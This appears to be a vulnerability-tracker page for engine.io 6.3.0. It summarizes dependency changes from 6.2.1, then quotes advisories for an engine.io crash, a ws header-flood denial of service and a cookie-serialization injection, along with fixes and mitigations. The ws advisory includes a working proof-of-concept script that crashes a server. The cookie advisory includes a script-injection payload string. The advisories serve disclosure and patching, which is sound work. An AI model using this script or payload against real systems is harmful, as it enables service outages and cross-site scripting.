Engine.IO version 6.3.0 introduces subtle yet important updates compared to its predecessor, version 6.2.1, impacting developers building real-time applications. A key difference lies in the updated dependency on ws, the WebSocket library, moving from ~8.2.3 to ~8.11.0. This update likely incorporates bug fixes, performance improvements, and potentially new features within the WebSocket handling, ensuring a more robust and efficient bidirectional communication layer for Engine.IO. Notably, the newer version also includes an updated engine.io-client dependency, updated from version 6.2.0 to 6.3.0, indicating potential synchronization of features and bug fixes across both the server and client components of the library and ensuring compatibility.
A minor but potentially relevant change lies in the prettier dev-dependency, upgraded from version 1.19.1 to 2.8.2. While primarily a code formatting tool, a newer version of prettier suggests adherence to more modern JavaScript coding standards, potentially improving code maintainability and readability for contributors to the project.
Finally, the dist object highlights a slight increase in the unpackedSize of the package, from 146502 bytes to 149613 bytes. This increase implies the addition of new code or assets, likely related to the updates in dependencies or internal improvements. Developers should consider these changes when upgrading to Engine.IO 6.3.0, especially regarding potential impact to bundle sizes and WebSocket compatibility. The updated release date also indicates continued maintenance and updates to the library.
All the vulnerabilities related to the version 6.3.0 of the package
engine.io Uncaught Exception vulnerability
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
TypeError: Cannot read properties of undefined (reading 'handlesUpgrades')
at Server.onWebSocket (build/server.js:515:67)
This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.
A fix has been released today (2023/05/02): 6.4.2
This bug was introduced in version 5.1.0 and included in version 4.1.0 of the socket.io parent package. Older versions are not impacted.
For socket.io users:
| Version range | engine.io version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.6.x | ~6.4.0 | npm audit fix should be sufficient |
| socket.io@4.5.x | ~6.2.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.6.x |
| socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.6.x |
| socket.io@4.0.x | ~5.0.0 | Not impacted |
| socket.io@3.1.x | ~4.1.0 | Not impacted |
| socket.io@3.0.x | ~4.0.0 | Not impacted |
| socket.io@2.5.0 | ~3.6.0 | Not impacted |
| socket.io@2.4.x and below | ~3.5.0 | Not impacted |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.ioThanks to Thomas Rinsma from Codean for the responsible disclosure.
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.